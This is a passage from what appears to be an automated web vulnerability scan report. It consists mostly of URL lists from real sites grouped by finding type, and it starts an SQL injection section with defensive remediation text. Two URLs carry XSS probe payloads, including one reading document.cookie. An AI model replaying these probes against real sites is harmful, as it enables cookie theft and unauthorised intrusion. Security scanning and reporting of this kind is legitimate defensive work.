24.337. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

24.338. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared

24.339. http://www.huddletogether.com/projects/lightbox2/

24.340. https://www.isc.org/software/inn

24.341. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

24.342. http://www.kbsp.com/

24.343. http://www.kelvinluck.com/

24.344. http://www.lau.edu.lb/x22

24.345. http://www.leafnode.org/

24.346. http://www.lithuanianjoomla.com/index.php

24.347. http://www.lithuanianjoomla.com/media/system/js/mootools-more.js

24.348. http://www.mit.edu/people/jik/software/xrn.html

24.349. https://www.mytraderonline.com/javascript/master_s_code.js

24.350. http://www.netlingo.com/acronyms.php

24.351. http://www.netlingo.com/add-edit/editor-guidelines.php

24.352. http://www.netlingo.com/contact/contact-us.php

24.353. http://www.netlingo.com/contact/linktonetlingo.php

24.354. http://www.netlingo.com/scripts/jquery.bookmark.js

24.355. http://www.netlingo.com/scripts/jquery.dimensions.js

24.356. http://www.netlingo.com/scripts/jquery.mousewheel.js

24.357. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue

24.358. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

24.359. http://www.noreastermagazine.com/

24.360. http://www.opensource.org/licenses/bsd-license.php

24.361. http://www.opensource.org/licenses/gpl-license.php

24.362. http://www.opensource.org/licenses/mit-license.php

24.363. http://www.openusenet.org/diablo/

24.364. http://www.ossp.org/pkg/tool/lmtp2nntp/

24.365. https://www.paperg.com/post.php

24.366. http://www.playshakespeare.com/

24.367. http://www.positioniseverything.net/easyclearing.html

24.368. http://www.pwc-traderonline.com/research/resources/

24.369. http://www.pwc-traderonline.com/sell/

24.370. http://www.rdrop.com/users/billmc/adcomplain.html

24.371. http://www.rochenhost.com/

24.372. http://www.rochenhost.com/joomla-hosting

24.373. http://www.rvtraderonline.com/research/resources/

24.374. http://www.saddi.com/software/newsfish/

24.375. http://www.safepeak.com/downloadtrial/

24.376. http://www.sailinganarchy.com/advertise.htm

24.377. http://www.sailinganarchy.com/breymaiersailing.com

24.378. http://www.sailinganarchy.com/calendar/index.php

24.379. http://www.sailinganarchy.com/editor/audio_video.php

24.380. http://www.sailinganarchy.com/editor/pimpin.php

24.381. http://www.sailinganarchy.com/index_page1.php

24.382. http://www.sailinganarchy.com/index_page2.php

24.383. http://www.sailinganarchy.com/java/ad_rotation.js

24.384. http://www.sailinganarchy.com/none

24.385. http://www.sailinganarchy.com/terms.htm

24.386. http://www.snowmobiletraderonline.com/sell/

24.387. http://www.soundingsonline.com/

24.388. http://www.soundingsonline.com/about-us

24.389. http://www.soundingsonline.com/advertise

24.390. http://www.soundingsonline.com/archives

24.391. http://www.soundingsonline.com/boat-shop

24.392. http://www.soundingsonline.com/boat-shop/know-how

24.393. http://www.soundingsonline.com/boat-shop/new-boats

24.394. http://www.soundingsonline.com/boat-shop/new-gear

24.395. http://www.soundingsonline.com/boat-shop/on-powerboats

24.396. http://www.soundingsonline.com/boat-shop/on-sailboats

24.397. http://www.soundingsonline.com/boat-shop/q-a-a

24.398. http://www.soundingsonline.com/boat-shop/sea-savvy

24.399. http://www.soundingsonline.com/boat-shop/tech-talk

24.400. http://www.soundingsonline.com/boat-shop/used-boat-review

24.401. http://www.soundingsonline.com/calendar

24.402. http://www.soundingsonline.com/career-opportunities

24.403. http://www.soundingsonline.com/columns-blogs

24.404. http://www.soundingsonline.com/columns-blogs/bay-tripper

24.405. http://www.soundingsonline.com/columns-blogs/books

24.406. http://www.soundingsonline.com/columns-blogs/new-england-fishing

24.407. http://www.soundingsonline.com/columns-blogs/under-way

24.408. http://www.soundingsonline.com/component/chronocontact/

24.409. http://www.soundingsonline.com/component/content/article/237622

24.410. http://www.soundingsonline.com/contact-us

24.411. http://www.soundingsonline.com/features

24.412. http://www.soundingsonline.com/features/destinations

24.413. http://www.soundingsonline.com/features/in-depth

24.414. http://www.soundingsonline.com/features/justyesterday

24.415. http://www.soundingsonline.com/features/lifestyle

24.416. http://www.soundingsonline.com/features/profiles

24.417. http://www.soundingsonline.com/features/technical

24.418. http://www.soundingsonline.com/features/type-of-boat

24.419. http://www.soundingsonline.com/index.php

24.420. http://www.soundingsonline.com/more/digital-publications

24.421. http://www.soundingsonline.com/more/the-masters-series

24.422. http://www.soundingsonline.com/news

24.423. http://www.soundingsonline.com/news/coastwise

24.424. http://www.soundingsonline.com/news/dispatches

24.425. http://www.soundingsonline.com/news/home-waters

24.426. http://www.soundingsonline.com/news/mishaps-a-rescues

24.427. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

24.428. http://www.soundingsonline.com/news/sailing

24.429. http://www.soundingsonline.com/news/todays-top-stories

24.430. http://www.soundingsonline.com/resources

24.431. http://www.soundingsonline.com/s_code.js

24.432. http://www.soundingsonline.com/site-map

24.433. http://www.soundingsonline.com/subscription-services

24.434. http://www.soundingsonline.com/subscription-services/preview-current-issue

24.435. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

24.436. http://www.speech.cs.cmu.edu/~sburke/pub/luhn_lib.html

24.437. http://www.thefeast.com/boston/

24.438. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

24.439. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

24.440. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

24.441. http://www.thepointebrodiecreek.com/

24.442. http://www.traderonline.com/advertise/

24.443. http://www.traderonline.com/javascript/master_s_code.js

24.444. http://www.traderonline.com/security/

24.445. http://www.w-w-i.com/

24.446. http://www.w-w-i.com/velux_5_oceans_2010_race

24.447. http://www.w-w-i.com/velux_5_oceans_2010_race/

24.448. http://www.w3.org/

24.449. http://www.w3.org/TR/css3-selectors/

24.450. http://www.w3.org/TR/html4/strict.dtd

24.451. http://www.x64bitdownload.com/js/rating.js

24.452. http://www.x64bitdownload.com/templates/X64/css/rating.css

24.453. http://www1.whdh.com/contact/

24.454. http://www1.whdh.com/contact/closed-caption-concerns

24.455. http://www1.whdh.com/events/

24.456. http://www1.whdh.com/features/articles/dish/BO144734/

24.457. http://www1.whdh.com/features/articles/dish/BO144759/

24.458. http://www1.whdh.com/features/articles/dish/BO144797/

24.459. http://www1.whdh.com/features/articles/dish/BO144833/

24.460. http://www1.whdh.com/features/articles/hank/BO144372/

24.461. http://www1.whdh.com/features/articles/hank/BO144452/

24.462. http://www1.whdh.com/features/articles/hank/BO144489/

24.463. http://www1.whdh.com/features/articles/hank/BO144588/

24.464. http://www1.whdh.com/features/articles/hiller/BO144771/

24.465. http://www1.whdh.com/features/articles/hiller/BO144776/

24.466. http://www1.whdh.com/features/articles/hiller/BO144796/

24.467. http://www1.whdh.com/features/articles/hiller/BO144813/

24.468. http://www1.whdh.com/features/articles/hiller/BO144841/

24.469. http://www1.whdh.com/features/articles/holiday_helping/BO144709/

24.470. http://www1.whdh.com/features/articles/holiday_helping/BO144719/

24.471. http://www1.whdh.com/features/articles/holiday_helping/BO144727/

24.472. http://www1.whdh.com/features/articles/holiday_helping/BO144733/

24.473. http://www1.whdh.com/includes/elements/accordion_whdh-senditto7

24.474. http://www1.whdh.com/includes/elements/accordion_whdh-storyideas

24.475. http://www1.whdh.com/includes/elements/accordion_whdh-viewervoices

24.476. http://www1.whdh.com/jobs/

24.477. http://www1.whdh.com/jobs/internships

24.478. http://www1.whdh.com/js/jq/jquery.hoverIntent-r5.min.js

24.479. http://www1.whdh.com/news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/

24.480. http://www1.whdh.com/privacypolicy

24.481. http://www1.whdh.com/sales/

24.482. http://www1.whdh.com/slideshows/view/BitterBlastTemperatures

24.483. http://www1.whdh.com/slideshows/view/FunintheSnow

24.484. http://www1.whdh.com/slideshows/view/January12thStormPets

24.485. http://www1.whdh.com/slideshows/view/January12thTreesDown

24.486. http://www1.whdh.com/slideshows/view/January18WinterStorm

24.487. http://www1.whdh.com/slideshows/view/January21SnowStorm

24.488. http://www3.whdh.com/mobile/phoneforecast/settings.php

24.489. http://xpn.altervista.org/

25. Private IP addresses disclosed

25.1. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html

25.2. http://green.autobytel.com/

25.3. http://whdhstore.hipcricket.com/

25.4. http://www.autobytel.com/x22

25.5. http://www.digitaltips.org/

25.6. http://www.google.com/sdch/GeNLY2f-.dct

25.7. http://www.metacafe.com/fplayer/

25.8. http://www.myride.com/

25.9. http://www.officedepot.com/promo.do

25.10. http://www.x64bitdownload.com/64-bit-news-downloads.html

25.11. http://www.x64bitdownload.com/64-bit-ssl-downloads.html

25.12. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html

26. Credit card numbers disclosed

26.1. http://d1.openx.org/ajs.php

26.2. http://www.masjo.com/

26.3. http://www.netlingo.com/2010mediakit.pdf

26.4. http://www.netlingo.com/news/Safe_and_Secure_in_Cyberspace.pdf

26.5. http://www.parenthood.com/

27. Robots.txt file

27.1. http://api.recaptcha.net/challenge

27.2. http://clients1.google.com/complete/search

27.3. http://demo.joomla.org/plugins/system/jceutilities/css/jceutilities.css

27.4. http://filewatcher.org/css/filewatcher.css

27.5. http://www.cloudaccess.net/templates/rt_quasar_j15/lib/gantry/css/gantry.css

27.6. https://www.cloudaccess.net/my-cloud-panel.html

27.7. http://www.microsoft.com/web/media/badge/install_using_webpi_btn.png

27.8. http://www.x64bitdownload.com/templates/X64/css/rating.css

27.9. http://www.youtube.com/subscribe_widget

28. Cacheable HTTPS response

28.1. https://acc.newsguy.com/cgi-bin/login_frm

28.2. https://acc.newsguy.com/cgi-bin/ngexpress_form

28.3. https://acc.newsguy.com/cgi-bin/sub_form

28.4. https://acc.newsguy.com/cgi-bin/sub_spot_form

28.5. https://acc.newsguy.com/cgi-bin/sub_trial_form

28.6. https://acc.newsguy.com/cgi-bin/sub_unlmt_form

28.7. https://acc.newsguy.com/cgi-bin/usenetports

28.8. https://acc.newsguy.com/lotto_bonuspicks.htm

28.9. https://acc.newsguy.com/lotto_details.htm

28.10. https://acc.newsguy.com/requestid.htm

28.11. https://acc.newsguy.com/user/-/accnt_billing

28.12. https://acc.newsguy.com/user/-/accnt_contact

28.13. https://acc.newsguy.com/user/-/accnt_flash

28.14. https://acc.newsguy.com/user/-/accnt_history

28.15. https://acc.newsguy.com/user/-/customer_referrals

28.16. https://acc.newsguy.com/user/-/referrals_cashout

28.17. https://acc.newsguy.com/user/accnt_overview

28.18. https://acc.newsguy.com/user/accnt_renew

28.19. https://acc.newsguy.com/user/accnt_settings

28.20. https://acc.newsguy.com/user/accnt_signup_usenet

28.21. https://acc.newsguy.com/user/accnt_upgrade

28.22. https://bugzilla.mozilla.org/show_bug.cgi

28.23. https://cloudaccess.infusionsoft.com/AddForms/processFormSecure.jsp

28.24. https://github.com/DataSift/TweetMeme-Chrome-Extension

28.25. https://hostedusa3.whoson.com/chat/chatstart.htm

28.26. https://maps-api-ssl.google.com/maps

28.27. https://maps-api-ssl.google.com/maps/api/js

28.28. https://spreadsheets0.google.com/embeddedform

28.29. https://www.bmwusa.com/Secured/FrameCheck.aspx

28.30. https://www.cloudaccess.net/copyright-policy.html

28.31. https://www.cloudaccess.net/network-report.html

28.32. https://www.cloudaccess.net/network-sla.html

28.33. https://www.cloudaccess.net/privacy-policy.html

28.34. https://www.cloudaccess.net/support-sla.html

28.35. https://www.cloudaccess.net/terms-of-service.html

28.36. https://www.google.com/adsense/support/bin/request.py

28.37. https://www.mytraderonline.com/css/promoCSS.php

28.38. https://www.mytraderonline.com/css/tolhomecss.php

28.39. https://www.mytraderonline.com/javascript/master_s_code.js

28.40. https://www.mytraderonline.com/javascript/realmedia.js

29. Multiple content types specified

30. HTML does not specify charset

30.1. https://acc.newsguy.com/a/memsubmit.asp

30.2. https://acc.newsguy.com/cgi-bin/login_frm

30.3. https://acc.newsguy.com/cgi-bin/ngexpress_form

30.4. https://acc.newsguy.com/cgi-bin/sub_form

30.5. https://acc.newsguy.com/cgi-bin/sub_spot_form

30.6. https://acc.newsguy.com/cgi-bin/sub_trial_form

30.7. https://acc.newsguy.com/cgi-bin/sub_unlmt_form

30.8. https://acc.newsguy.com/cgi-bin/usenetports

30.9. https://acc.newsguy.com/lotto_bonuspicks.htm

30.10. https://acc.newsguy.com/lotto_details.htm

30.11. https://acc.newsguy.com/requestid.htm

30.12. https://acc.newsguy.com/user/-/accnt_billing

30.13. https://acc.newsguy.com/user/-/accnt_contact

30.14. https://acc.newsguy.com/user/-/accnt_flash

30.15. https://acc.newsguy.com/user/-/accnt_history

30.16. https://acc.newsguy.com/user/-/customer_referrals

30.17. https://acc.newsguy.com/user/-/referrals_cashout

30.18. https://acc.newsguy.com/user/accnt_overview

30.19. https://acc.newsguy.com/user/accnt_renew

30.20. https://acc.newsguy.com/user/accnt_settings

30.21. https://acc.newsguy.com/user/accnt_signup_usenet

30.22. https://acc.newsguy.com/user/accnt_upgrade

30.23. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91

30.24. http://ads.pointroll.com/PortalServe/

30.25. http://adserver.teracent.net/favicon.ico

30.26. http://api.tweetmeme.com/url_info.jsonc

30.27. http://b3.mookie1.com/2/B3DM/DLX/1@x71

30.28. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

30.29. http://c5.zedo.com/ads3/i/

30.30. http://c5.zedo.com/jsc/c5/ff2.html

30.31. http://cdn.apture.com/media/html/aptureLoadIframe.html

30.32. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html

30.33. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html

30.34. http://classiccars.com/go/homepage_TOL.html

30.35. http://classiccars.com/go/research_TOL.html

30.36. http://classiccars.com/go/sell_TOL.html

30.37. http://dave.willfork.com/slrnface/

30.38. http://delb.opt.fimserve.com/favicon.ico

30.39. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23

30.40. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92

30.41. http://dm.de.mookie1.com/2/B3DM/DLX/@x94

30.42. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json

30.43. http://famspam.com/facebox/

30.44. http://fls.doubleclick.net/activityi

30.45. http://golded-plus.sourceforge.net/

30.46. http://grn.sourceforge.net/

30.47. http://home.big.or.jp/

30.48. http://hostedusa3.whoson.com/

30.49. http://hostedusa3.whoson.com/include.js

30.50. http://hostedusa3.whoson.com/invite.js

30.51. http://husky.sourceforge.net/

30.52. http://ib.adnxs.com/ptj

30.53. http://ifmail.sourceforge.net/

30.54. http://jqueryui.com/about

30.55. http://jqueryui.com/themeroller/

30.56. http://loadus.exelator.com/load/net.php

30.57. http://mako.cc/projects/aub/

30.58. http://mako.cc/projects/aub/docs/aub.1.html

30.59. http://mako.cc/projects/aub/docs/aubconf.1.html

30.60. http://media.fastclick.net/w/pg

30.61. http://media.fastclick.net/w/win.bid

30.62. http://mediacdn.disqus.com/1295633860

30.63. http://mediacdn.disqus.com/1295633860/html/xdm.html

30.64. http://mig.nexac.com/2/B3DM/DLX/1@x96

30.65. http://netwinsite.com/

30.66. http://newsgrab.sourceforge.net/

30.67. http://newsguy.com/

30.68. http://newsguy.com/accountbandwidth.htm

30.69. http://newsguy.com/accountemail.htm

30.70. http://newsguy.com/affiliate.htm

30.71. http://newsguy.com/allinone.htm

30.72. http://newsguy.com/birthday.htm

30.73. http://newsguy.com/bonusbytes.htm

30.74. http://newsguy.com/cellphone.htm

30.75. http://newsguy.com/commd6.htm

30.76. http://newsguy.com/contact.htm

30.77. http://newsguy.com/copy.htm

30.78. http://newsguy.com/diagnostics.htm

30.79. http://newsguy.com/email.htm

30.80. http://newsguy.com/groups.htm

30.81. http://newsguy.com/ispcon.htm

30.82. http://newsguy.com/members.htm

30.83. http://newsguy.com/msgpanel/message.asp

30.84. http://newsguy.com/news.asp

30.85. http://newsguy.com/news.htm

30.86. http://newsguy.com/newsguys.htm

30.87. http://newsguy.com/overview.htm

30.88. http://newsguy.com/policy.htm

30.89. http://newsguy.com/services.htm

30.90. http://newsguy.com/user_info.asp

30.91. http://noisybox.net/computers/nzbperl/

30.92. http://people.joomla.org/modules/mod_pixsearch_ng/media/js/gpixsearch/EC114CAD1010D1980F044A461CE47B22.cache.html

30.93. http://pessoal.org/papercut/

30.94. http://picmonger.sourceforge.net/

30.95. http://r.nexac.com/e/getdata.xgi

30.96. http://seattletimes.nwsource.com/html/businesstechnology/2014020427_amazon24.html/x22

30.97. http://sites.inka.de/~bigred/sw/c-nocem.html

30.98. http://tags.bluekai.com/site/10

30.99. http://tweetmeme.com/channels

30.100. http://tweetmeme.com/media/image

30.101. http://tweetmeme.com/media/video

30.102. http://tweetmeme.com/popup/follow

30.103. http://tweetmeme.com/popup/tweet

30.104. http://tweetmeme.com/story/3832254868/htc-hd2-can-now-dual-boot-windows-phone-7-and-android-promises-to-love-them-equally-engadget

30.105. http://tweetmeme.com/style/week

30.106. http://uac.advertising.com/wrapper/aceUACping.htm

30.107. http://venedet.michnica.net/download/donate.html

30.108. http://whdhstore.hipcricket.com/

30.109. http://wildspark.com/asher/ija/

30.110. http://www.armanijeans-theroom.com/

30.111. http://www.aub.org/x22

30.112. http://www.autocheck.com/

30.113. http://www.autotrader.com/inc/ad.html

30.114. http://www.autotraderclassics.com/find/index.xhtml/x22

30.115. http://www.autotraderclassics.com/x22

30.116. http://www.bymnews.com/news/newsList.php

30.117. http://www.careersingear.com/

30.118. http://www.carsdirect.com/x22

30.119. http://www.freebsd.org/cgi/url.cgi

30.120. http://www.google.com/instant/

30.121. http://www.google.com/intl/en/about.html

30.122. http://www.google.com/intl/en/ads/

30.123. http://www.google.com/intl/en/options/

30.124. http://www.mit.edu/people/jik/software/xrn.html

30.125. http://www.munit.co.uk/

30.126. https://www.mytraderonline.com/css/promoCSS.php

30.127. https://www.mytraderonline.com/css/tolhomecss.php

30.128. https://www.mytraderonline.com/javascript/master_s_code.js

30.129. https://www.mytraderonline.com/javascript/realmedia.js

30.130. http://www.netlingo.com/includes/category.php

30.131. http://www.netlingo.com/iphone/

30.132. http://www.netlingo.com/iphone/index.php

30.133. http://www.netlingo.com/more/adsizes.php

30.134. http://www.netlingo.com/more/color/index.php

30.135. http://www.newsguy.com/overview.htm

30.136. http://www.newsreaders.com/unix/utilities.html/x22

30.137. http://www.nih.at/cg/

30.138. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm

30.139. http://www.openusenet.org/diablo/

30.140. http://www.ossp.org/pkg/tool/lmtp2nntp/

30.141. http://www.paperg.com/jsfb/embed.php

30.142. http://www.rdrop.com/users/billmc/adcomplain.html

30.143. http://www.sailinganarchy.com/ADs/nauticexpo/nauticexpo.htm

30.144. http://www.sailinganarchy.com/breymaiersailing.com

30.145. http://www.sailinganarchy.com/none

30.146. http://www.soundingsonline.com/

30.147. http://www.soundingssellmyboat.com/

30.148. http://www.traderonline.com/css/promoCSS.php

30.149. http://www.traderonline.com/css/tolhomecss.php

30.150. http://www.traderonline.com/javascript/master_s_code.js

30.151. http://www.traderonline.com/javascript/realmedia.js

30.152. http://www.traderpub.com/favicon.ico

30.153. http://www.traderpub.com/x22

30.154. http://www.vox.com/.shared/css/base.css

30.155. http://www.washington.edu/alpine/

30.156. http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3Ee6e3afeb687/a

30.157. http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee6e3afeb687/a

30.158. http://www.washington.edu/alpinef972a

30.159. http://www.washington.edu/alpinef972a

30.160. http://www.washington.edu/alpinef972ae6e3afeb687/

30.161. http://www.washington.edu/alpinef972a

30.162. http://www.washington.edu/alpinef972ae6e3afeb687/

30.163. http://www.washington.edu/pine/

30.164. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

30.165. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

30.166. http://xads.zedo.com/ads3/a

31. HTML uses unrecognised charset

31.1. http://home.big.jp/flets/

31.2. http://joomlaportal.ru/content/view/2239/70/

31.3. http://sorgalla.com/

31.4. http://sorgalla.com/jcarousel/

31.5. http://www.autotrader.com/fyc/index.jsp/x22

31.6. http://www.autotrader.com/hornav/trader/index.jsp/x22

31.7. http://www.autotrader.com/research/certified-cars/index.jsp/x22

31.8. http://www.autotrader.com/research/index.jsp/x22

31.9. http://www.autotrader.com/research/new-cars/index.jsp/x22

31.10. http://www.autotrader.com/research/used-cars/index.jsp/x22

31.11. http://www.autotrader.com/x22/x3e/x3cli

31.12. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

31.13. http://www.joomla-ua.org/content/view/400/10/

32. Content type incorrectly stated

32.1. http://7newsboston.disqus.com/block.js

32.2. http://7newsboston.disqus.com/embed/editcomment.html

32.3. http://7newsboston.disqus.com/hidereaction.js

32.4. http://7newsboston.disqus.com/highlight.js

32.5. http://7newsboston.disqus.com/kill.js

32.6. http://7newsboston.disqus.com/more_reactions.js

32.7. http://7newsboston.disqus.com/reportspam.js

32.8. http://7newsboston.disqus.com/show_user_votes.js

32.9. http://7newsboston.disqus.com/subscribe.js

32.10. http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/post_report/

32.11. http://7newsboston.disqus.com/thread_share.js

32.12. http://7newsboston.disqus.com/thread_vote.js

32.13. http://7newsboston.disqus.com/toggle_thread_closed.js

32.14. http://7newsboston.disqus.com/toggle_thread_killed.js

32.15. http://7newsboston.disqus.com/update_days_alive.js

32.16. http://7newsboston.disqus.com/update_moderate_all.js

32.17. http://7newsboston.disqus.com/vote.js

32.18. http://a1.twimg.com/profile_images/343677863/twitterProfilePhoto_mini.jpg

32.19. http://ad.masjo.com/www/images/9e5dbe547324652614df8323d01ce01e.jpg

32.20. http://ads.pointroll.com/PortalServe/

32.21. http://ads.tweetmeme.com/impression.jpg

32.22. http://api.kickapps.com/rest/getvideometadata/404472/94274

32.23. http://api.tweetmeme.com/url_info.jsonc

32.24. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html

32.25. http://cdnserve.a-widget.com/service/getWidget2.kickAction

32.26. http://dave.willfork.com/slrnface/

32.27. http://delb.opt.fimserve.com/favicon.ico

32.28. http://delb.opt.fimserve.com/fimbid/

32.29. http://developer.joomla.org/media/system/js/mootools-more.js

32.30. http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab

32.31. http://drn.newsguy.com/newsgrps.txt

32.32. http://fastdial.com/misc/favicon.ico

32.33. http://hostedusa3.whoson.com/include.js

32.34. http://hostedusa3.whoson.com/invite.js

32.35. http://javadl-esd.sun.com/update/AU/map-2.0.2.4.xml

32.36. http://joomlacode.org/favicon.ico

32.37. http://joomlacode.org/gf/

32.38. http://keywords.fmpub.net/

32.39. http://kickapps.yuku.com/kickapps/service/getWidget.kickAction

32.40. http://l.apture.com/v2/

32.41. http://mako.cc/projects/aub/COPYING

32.42. http://mako.cc/projects/aub/docs/Introducing_AUB

32.43. http://mako.cc/projects/aub/docs/USAGE

32.44. https://maps-api-ssl.google.com/maps/api/js

32.45. http://maps.google.com/maps/api/js

32.46. http://newsguy.com/user_info.asp

32.47. http://people.joomla.org/components/com_community/assets/group_thumb.png

32.48. http://people.joomla.org/plugins/system/cdscriptegrator/libraries/highslide/graphics/zoomout.cur

32.49. http://people.joomla.org/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js

32.50. http://ping.crowdscience.com/ping.js

32.51. http://r.nexac.com/e/getdata.xgi

32.52. http://rt.disqus.com/forums/realtime-cached.js

32.53. https://secure.disqus.com/embed/login.html

32.54. http://spongecell.com/api/events/915725/buy_tickets

32.55. http://spongecell.com/flash/download/264001/ad.swf

32.56. http://static.fmpub.net/site/tweetmeme

32.57. http://static.fmpub.net/zone/2671

32.58. http://static.fmpub.net/zone/2673

32.59. http://tweetmeme.s3.amazonaws.com/channel_thumbs/27.jpg

32.60. http://urls.api.twitter.com/1/urls/count.json

32.61. http://users.tpg.com.au/j_birch/plugins/superfish/changelog.txt

32.62. http://venedet.michnica.net/media/system/js/mootools-more.js

32.63. http://venedet.michnica.net/templates/beez_20/fonts/TitilliumMaps29L002.otf

32.64. http://wildspark.com/asher/ija/

32.65. http://www.abbreviations.com/images/goog.jpg

32.66. http://www.abbreviations.com/images/t.gif

32.67. http://www.adobe.com/xml/schemas/PolicyFile.xsd

32.68. http://www.apache.org/licenses/LICENSE-2.0

32.69. http://www.autobytel.com/syndication/act_newsletter_submit.cfm

32.70. http://www.autocheck.com/consumers/stylesheets/images/homepage/homepage_slides/slides_container.jpg

32.71. http://www.autocheck.com/favicon.ico

32.72. http://www.autotrader.com/ajax/backButtonFix.jsp

32.73. http://www.autotrader.com/no_cache/ac/hp_rotating_promos.asis

32.74. http://www.autotrader.com/no_cache/ac/index_wwwautoconnectcom_ac.asis

32.75. http://www.autotrader.com/no_cache/ac/trader_clicks_0001_nocount.asis

32.76. http://www.autotrader.com/no_cache/ac/trader_clicks_0002_nocount.asis

32.77. http://www.autotrader.com/no_cache/ac/trader_clicks_0005_nocount.asis

32.78. http://www.autotrader.com/no_cache/ac/trader_clicks_0006_nocount.asis

32.79. http://www.autotrader.com/no_cache/ac/trader_clicks_0009_nocount.asis

32.80. http://www.autotrader.com/no_cache/ac/trader_clicks_0016_nocount.asis

32.81. http://www.autotraderstatic.com/dwr/interface/MarketManager.js

32.82. http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js

32.83. http://www.autotraderstatic.com/dwr/interface/UserMsgController.js

32.84. http://www.autotraderstatic.com/inc/js/Tabber.js

32.85. http://www.autotraderstatic.com/inc/js/UltraPop.js

32.86. http://www.beirut.com/favicon.ico

32.87. http://www.cloudaccess.net/templates/rt_quasar_j15/css/vegur-m_0600-webfont.woff

32.88. http://www.facebook.com/extern/login_status.php

32.89. http://www.foxaudiencenetwork.com/favicon.ico

32.90. http://www.google.com/mbd

32.91. http://www.google.com/recaptcha/api/reload

32.92. http://www.kbsp.com/x/fonts/AKZIGBEM.TTF

32.93. http://www.kbsp.com/x/fonts/AKZIGBES.TTF

32.94. http://www.lithuanianjoomla.com/media/system/js/mootools-more.js

32.95. http://www.masjo.com/wp-content/plugins/archieve/images/913e4_new_script_host-39261-1228323711.jpeg

32.96. https://www.mytraderonline.com/css/promoCSS.php

32.97. https://www.mytraderonline.com/css/tolhomecss.php

32.98. https://www.mytraderonline.com/javascript/master_s_code.js

32.99. https://www.mytraderonline.com/javascript/realmedia.js

32.100. http://www.netlingo.com/favicon.ico

32.101. http://www.newsreaders.com/favicon.ico

32.102. http://www.paperg.com/jsfb/embed.php

32.103. http://www.parenthood.com/favicon.ico

32.104. http://www.soundingsonline.com/

32.105. http://www.traderonline.com/css/promoCSS.php

32.106. http://www.traderonline.com/css/tolhomecss.php

32.107. http://www.traderonline.com/javascript/master_s_code.js

32.108. http://www.traderonline.com/javascript/realmedia.js

32.109. http://www.vox.com/.shared/css/base.css

32.110. http://www.w3.org/1999/02/22-rdf-syntax-ns

32.111. http://www.w3.org/TR/html4/strict.dtd

32.112. http://www1.whdh.com/favicon.ico

32.113. http://www1.whdh.com/includes/elements/accordion_whdh-links

32.114. http://www1.whdh.com/js/sunbeam09.js

32.115. http://www3.whdh.com/favicon.ico

33. Content type is not specified

33.1. http://click.linksynergy.com/fs-bin/click

33.2. http://www.assoc-amazon.com/s/ads-common.js

33.3. http://www.aucegypt.edu/x22



1. SQL injection
There are 195 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N5875.270604.B3/B5111946.91

Issue detail

